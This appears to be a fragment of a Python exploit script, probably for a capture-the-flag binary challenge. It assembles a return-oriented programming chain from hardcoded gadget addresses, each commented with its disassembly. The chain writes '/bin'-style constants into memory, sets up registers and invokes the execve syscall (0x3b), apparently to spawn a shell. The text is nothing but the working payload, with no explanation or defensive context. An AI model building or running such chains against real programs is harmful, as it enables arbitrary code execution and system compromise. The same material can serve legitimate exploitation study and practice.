payload = p64(0x40125d)
#0x000000000040125d: pop rbp; ret; 
payload += p64(0x40a0ad)+p64(0x403dd6)
# 0x0000000000403dd6: pop rbx; ret; 
payload += p64(0x6e69622f)+p64(0x40125c)
# 0x40125c: add dword ptr [rbp - 0x3d], ebx ; nop ; ret
payload += p64(0x40125d)
# 0x000000000040125d: pop rbp; ret; 
payload += p64(0x40a0b1)+p64(0x403dd6)
# 0x0000000000403dd6: pop rbx; ret; 
payload += p64(0x68662f)+p64(0x40125c)
# 0x40125c: add dword ptr [rbp - 0x3d], ebx ; nop ; ret
payload += p64(0x4017d3)
# 0x00000000004017d3: pop rdi; ret; 
payload += p64(0x40a070)+p64(0x4017d1)
# 0x00000000004017d1: pop rsi; pop r15; ret; 
payload += p64(0x0)+p64(0x0)+p64(0x40121f)
# 0x000000000040121f: mov eax, 0; test rax, rax; je 0x1230; mov edi, 0x40a080; jmp rax; 
payload += p64(0x40395d)
# 0x000000000040395d: mov edx, eax; shr rdx, 0x3f; add rax, rdx; sar rax, 1; jne 0x396d; pop rbp; ret; 
payload += p64(0x0)+p64(0x403bad)
# 0x0000000000403bad: pop r12; ret; 
payload += p64(0x3b)+p64(0x403aa7)
# 0x0000000000403aa7: mov eax, r12d; pop rbx; pop rbp; pop r12; pop r13; pop r14; pop r15; ret; 
payload += p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x404215)
# 0x0000000000404215: syscall; 
payload += b''
